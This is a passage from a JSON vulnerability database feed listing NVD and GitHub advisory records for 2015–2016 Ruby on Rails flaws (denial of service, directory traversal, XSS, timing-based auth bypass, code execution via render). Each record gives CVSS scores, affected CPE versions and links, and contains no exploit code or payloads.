"cpe:2.3:a:rubyonrails:rails:4.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.12:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:rc2:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:00:09", "description": "actionpack/lib/action_dispatch/http/mime_type.rb in Action Pack in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not properly restrict use of the MIME type cache, which allows remote attackers to cause a denial of service (memory consumption) via a crafted HTTP Accept header.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-16T02:59:00", "type": "cve", "title": "CVE-2016-0751", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0751"], "modified": "2019-08-08T15:43:00", "cpe": ["cpe:/a:rubyonrails:rails:4.1.0", "cpe:/a:rubyonrails:rails:4.1.12", "cpe:/a:rubyonrails:rails:4.2.0", "cpe:/a:rubyonrails:rails:4.0.6", "cpe:/a:rubyonrails:rails:4.2.5", "cpe:/a:rubyonrails:ruby_on_rails:4.0.12", "cpe:/a:rubyonrails:rails:4.0.10", "cpe:/a:rubyonrails:rails:4.0.2", "cpe:/a:rubyonrails:rails:4.0.5", "cpe:/a:rubyonrails:rails:4.2.1", "cpe:/a:rubyonrails:rails:4.1.1", "cpe:/a:rubyonrails:rails:4.1.8", "cpe:/a:rubyonrails:rails:4.2.2", "cpe:/a:rubyonrails:ruby_on_rails:4.1.11", "cpe:/a:rubyonrails:ruby_on_rails:4.0.13", "cpe:/a:rubyonrails:rails:4.0.3", "cpe:/a:rubyonrails:rails:4.2.4", "cpe:/a:rubyonrails:rails:4.0.4", "cpe:/a:rubyonrails:rails:4.1.2", "cpe:/a:rubyonrails:rails:4.1.6", "cpe:/a:rubyonrails:rails:4.0.7", "cpe:/a:rubyonrails:rails:4.1.7", "cpe:/a:rubyonrails:ruby_on_rails:4.0.11.1", "cpe:/a:rubyonrails:rails:4.1.3", "cpe:/a:rubyonrails:ruby_on_rails:4.0.10", "cpe:/a:rubyonrails:rails:4.2.3", "cpe:/a:rubyonrails:rails:4.1.5", "cpe:/a:rubyonrails:rails:5.0.0", "cpe:/a:rubyonrails:rails:4.1.9", "cpe:/a:rubyonrails:rails:4.0.0", "cpe:/a:rubyonrails:rails:4.1.10", "cpe:/a:rubyonrails:ruby_on_rails:3.2.22", "cpe:/a:rubyonrails:rails:4.0.9", "cpe:/a:rubyonrails:rails:4.1.4", "cpe:/a:rubyonrails:rails:4.0.1", "cpe:/a:rubyonrails:rails:4.1.13", "cpe:/a:rubyonrails:rails:4.0.8", "cpe:/a:rubyonrails:ruby_on_rails:4.0.11"], "id": "CVE-2016-0751", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0751", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:rubyonrails:rails:4.0.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.13:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.10:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.9:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:00:12", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-16T02:59:00", "type": "cve", "title": "CVE-2016-0752", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2019-08-08T15:43:00", "cpe": ["cpe:/a:rubyonrails:rails:4.1.0", "cpe:/a:rubyonrails:rails:4.1.12", "cpe:/a:rubyonrails:rails:4.2.0", "cpe:/a:rubyonrails:rails:4.0.6", "cpe:/a:rubyonrails:rails:4.2.5", "cpe:/a:rubyonrails:rails:4.0.10", "cpe:/a:rubyonrails:rails:4.0.2", "cpe:/a:rubyonrails:rails:4.0.5", "cpe:/a:rubyonrails:rails:4.2.1", "cpe:/a:rubyonrails:rails:4.1.1", "cpe:/a:rubyonrails:rails:4.1.8", "cpe:/a:rubyonrails:rails:4.2.2", "cpe:/a:rubyonrails:ruby_on_rails:4.1.11", "cpe:/a:rubyonrails:rails:4.0.3", "cpe:/a:rubyonrails:rails:4.2.4", "cpe:/a:rubyonrails:rails:4.0.4", "cpe:/a:rubyonrails:rails:4.1.14", "cpe:/a:rubyonrails:rails:4.1.2", "cpe:/a:rubyonrails:rails:4.1.6", "cpe:/a:rubyonrails:rails:4.0.7", "cpe:/a:rubyonrails:rails:4.1.7", "cpe:/a:rubyonrails:rails:4.1.3", "cpe:/a:rubyonrails:rails:4.2.3", "cpe:/a:rubyonrails:rails:4.1.5", "cpe:/a:rubyonrails:rails:5.0.0", "cpe:/a:rubyonrails:rails:4.1.9", "cpe:/a:rubyonrails:rails:4.0.0", "cpe:/a:rubyonrails:rails:4.1.10", "cpe:/a:rubyonrails:ruby_on_rails:3.2.22", "cpe:/a:rubyonrails:rails:4.0.9", "cpe:/a:rubyonrails:rails:4.1.4", "cpe:/a:rubyonrails:rails:4.0.1", "cpe:/a:rubyonrails:rails:4.1.13", "cpe:/a:rubyonrails:rails:4.0.8"], "id": "CVE-2016-0752", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0752", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:rubyonrails:rails:4.0.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.9:*:*:*:*:*:*:*"]}], "github": [{"lastseen": "2023-01-23T20:08:38", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.2 and 4.x before 4.1.14.2 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0752.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-10-24T18:33:35", "type": "github", "title": "actionview Path Traversal vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097"], "modified": "2023-01-23T18:03:51", "id": "GHSA-VX9J-46RH-FQR8", "href": "https://github.com/advisories/GHSA-vx9j-46rh-fqr8", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-23T20:08:38", "description": "Cross-site scripting (XSS) vulnerability in Action View in Ruby on Rails 3.x before 3.2.22.3, 4.x before 4.2.7.1, and 5.x before 5.0.0.1 might allow remote attackers to inject arbitrary web script or HTML via text declared as \"HTML safe\" and used as attribute values in tag handlers.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-10-24T18:33:35", "type": "github", "title": "actionview Cross-site Scripting vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2023-01-23T17:59:44", "id": "GHSA-PC3M-V286-2JWJ", "href": "https://github.com/advisories/GHSA-pc3m-v286-2jwj", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T05:07:40", "description": "The http_basic_authenticate_with method in actionpack/lib/action_controller/metal/http_authentication.rb in the Basic Authentication implementation in Action Controller in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not use a constant-time algorithm for verifying credentials, which makes it easier for remote attackers to bypass authentication by measuring timing differences.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-10-24T18:33:36", "type": "github", "title": "actionpack is vulnerable to remote bypass authentication", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576"], "modified": "2023-01-11T05:07:24", "id": "GHSA-P692-7MM3-3FXG", "href": "https://github.com/advisories/GHSA-p692-7mm3-3fxg", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-23T17:08:30", "description": "Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2017-10-24T18:33:35", "type": "github", "title": "actionpack allows remote code execution via application's unrestricted use of render method", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2023-01-23T15:11:26", "id": "GHSA-78RC-8C29-P45G", "href": "https://github.com/advisories/GHSA-78rc-8c29-p45g", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-09T05:07:36", "description": "actionpack/lib/action_dispatch/http/mime_type.rb in Action Pack in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not properly restrict use of the MIME type cache, which allows remote attackers to cause a denial of service (memory consumption) via a crafted HTTP Accept header.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-24T18:33:35", "type": "github", "title": "actionpack is vulnerable to denial of service via a crafted HTTP Accept header", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0751"], "modified": "2023-01-09T05:03:05", "id": "GHSA-FFPV-C4HM-3X6V", "href": "https://github.com/advisories/GHSA-ffpv-c4hm-3x6v", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-09T05:07:36", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-24T18:33:35", "type": "github", "title": "Directory traversal vulnerability in Action View in Ruby on Rails", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2023-01-09T05:03:40", "id": "GHSA-XRR4-P6FQ-HJG7", "href": "https://github.com/advisories/GHSA-xrr4-p6fq-hjg7", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-09T05:07:30", "description": "Withdrawn, accidental duplicate publish.\n\nDirectory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.2 and 4.x before 4.1.14.2 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0752.", "cvss3": {}, "published": "2018-08-13T20:48:52", "type": "github", "title": "Moderate severity vulnerability that affects actionview", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-0752"], "modified": "2023-01-09T05:02:49", "id": "GHSA-2PWF-XWR3-HP55", "href": "https://github.com/advisories/GHSA-2pwf-xwr3-hp55", "cvss": {"score": 0.0, "vector": "NONE"}}], "debiancve": [{"lastseen": 